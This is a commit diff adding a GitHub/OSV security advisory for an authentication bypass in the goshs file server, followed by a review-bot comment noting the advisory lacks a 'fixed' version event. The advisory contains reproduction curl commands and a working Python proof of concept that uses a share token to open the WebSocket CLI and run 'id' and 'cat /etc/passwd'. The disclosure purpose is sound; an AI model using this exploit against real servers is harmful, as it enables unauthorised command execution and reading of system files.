
Commit 2b95937

1 parent a354bc5 commit 2b95937

1 file changed

Lines changed: 54 additions & 0 deletions

@@ -0,0 +1,54 @@
1+
{
2+
"schema_version": "1.4.0",
3+
"id": "GHSA-jgfx-74g2-9r6g",
4+
"modified": "2026-04-01T20:58:48Z",
5+
"published": "2026-04-01T20:58:48Z",
6+
"aliases": [
7+
"CVE-2026-34581"
8+
],
9+
"summary": "goshs has Auth Bypass via Share Token",
10+
"details": "### Summary\nWhen using the `Share Token` it is possible to bypass the limited selected file download with all the gosh functionalities, including code exec.\n\n### Details\n\nThe `BasicAuthMiddleware` checks for a `?token=` parameter **before** checking credentials. If the token exists in `SharedLinks`, the request passes through with **no auth check at all**. The handler then processes all query parameters — including `?ws` (WebSocket) which has higher priority than `?token`.\n\n```go\n// middleware.go:22-30 — token check runs FIRST\ntoken := r.URL.Query().Get(\"token\")\nif token != \"\" {\n _, ok := fs.SharedLinks[token]\n if ok {\n next.ServeHTTP(w, r) // Full auth bypass\n return\n }\n}\n// ... normal auth checks never reached\n```\n\nA share token is designed for **single-file, time-limited downloads**. But the middleware bypass grants access to everything — directory listing, file deletion, clipboard, WebSocket, and CLI command execution.\n\n\n**1. Create a webroot:**\n\n```bash\nmkdir -p /tmp/goshs-webroot\necho \"shareable file\" > /tmp/goshs-webroot/shareable.txt\n```\n\n**2. Start goshs with auth + TLS + CLI mode:**\n\n```bash\n/tmp/goshs-test -d /tmp/goshs-webroot -b 'admin:password' -s -ss -c -p 8000\n```\n\n> CLI mode requires auth (`-b`) and TLS (`-s -ss`). This is the documented usage — not a weakened config.\n\n**3. Verify authentication is required:**\n\n```bash\ncurl -sk https://localhost:8000/\nNot authorized\n```\n\n**4. As a legitimate user, create a share link:**\n\n```bash\ncurl -sk -u admin:password 'https://localhost:8000/shareable.txt?share'\n```\n\nResponse:\n```json\n{\"urls\":[\"https://127.0.0.1:8000/shareable.txt?token=gMP-w0hXRs-Q-FEZku63kA\"]}\n```\n\nSave the token value (e.g., `gMP-w0hXRs-Q-FEZku63kA`).\n\n**5. 
Prove the token bypasses auth for WebSocket:**\n\n```bash\n# Without token → 401 (blocked)\ncurl -sk -o /dev/null -w \"%{http_code}\" \\\n -H \"Connection: Upgrade\" -H \"Upgrade: websocket\" \\\n -H \"Sec-WebSocket-Version: 13\" -H \"Sec-WebSocket-Key: dGhlIHNhbXBsZSBub25jZQ==\" \\\n 'https://localhost:8000/?ws'\n# 401\n\n# With token → 101 Switching Protocols (auth bypassed!)\ncurl -sk -o /dev/null -w \"%{http_code}\" \\\n -H \"Connection: Upgrade\" -H \"Upgrade: websocket\" \\\n -H \"Sec-WebSocket-Version: 13\" -H \"Sec-WebSocket-Key: dGhlIHNhbXBsZSBub25jZQ==\" \\\n 'https://localhost:8000/?ws&token=gMP-w0hXRs-Q-FEZku63kA'\n# 101\n```\n\nFor a Full PoC, you can run the python file attached below, it will run `id` and `cat /etc/passwd`.\n\n\n\n\n### PoC\n\n``` python\nimport json, ssl, websocket\n\nTOKEN = \"gMP-w0hXRs-Q-FEZku63kA\" # ← replace with your token\n\nws = websocket.create_connection(\n f\"wss://localhost:8000/?ws&token={TOKEN}\",\n sslopt={\"cert_reqs\": ssl.CERT_NONE},\n)\nprint(\"[+] Connected WITHOUT credentials!\")\n\n# Execute 'id'\nws.send('{\"type\":\"command\",\"Content\":\"id\"}')\nimport time; time.sleep(1)\nresp = json.loads(ws.recv())\nprint(f\"Output: {resp['content']}\")\n# uid=501(youruser) gid=20(staff) ...\n\n# Execute 'cat /etc/passwd'\nws.send('{\"type\":\"command\",\"Content\":\"cat /etc/passwd\"}')\ntime.sleep(1)\nresp = json.loads(ws.recv())\nprint(f\"Output: {resp['content']}\")\n\nws.close()\n```\nA patch is available at https://github.com/patrickhener/goshs/releases/tag/v2.0.0-beta.2.",
11+
"severity": [
12+
{
13+
"type": "CVSS_V3",
14+
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N"
15+
}
16+
],
17+
"affected": [
18+
{
19+
"package": {
20+
"ecosystem": "Go",
21+
"name": "github.com/patrickhener/goshs"
22+
},
23+
"ranges": [
24+
{
25+
"type": "ECOSYSTEM",
26+
"events": [
27+
{
28+
"introduced": "1.1.0"
29+
}
30+
]
31+
}
32+
]
33+
}
34+
],
35+
"references": [
36+
{
37+
"type": "WEB",
38+
"url": "https://github.com/patrickhener/goshs/security/advisories/GHSA-jgfx-74g2-9r6g"
39+
},
40+
{
41+
"type": "PACKAGE",
42+
"url": "https://github.com/patrickhener/goshs"
43+
}
44+
],
45+
"database_specific": {
46+
"cwe_ids": [
47+
"CWE-288"
48+
],
49+
"severity": "HIGH",
50+
"github_reviewed": true,
51+
"github_reviewed_at": "2026-04-01T20:58:48Z",
52+
"nvd_published_at": null
53+
}
54+
}
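Review bot: the `affected[0].ranges[0].events` block declares only `"introduced": "1.1.0"` and no `fixed` event, even though the `details` text states "A patch is available at https://github.com/patrickhener/goshs/releases/tag/v2.0.0-beta.2"; as written, OSV consumers (osv-scanner, govulncheck) will flag every version from 1.1.0 onward, including the patched release. Add a matching `fixed` event to the `ECOSYSTEM` range (or `last_affected` if the fixed version cannot be expressed for this module), and consider adding a `{"type": "FIX", "url": "https://github.com/patrickhener/goshs/releases/tag/v2.0.0-beta.2"}` entry to `references` so the remediation is machine-readable rather than only mentioned in prose.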
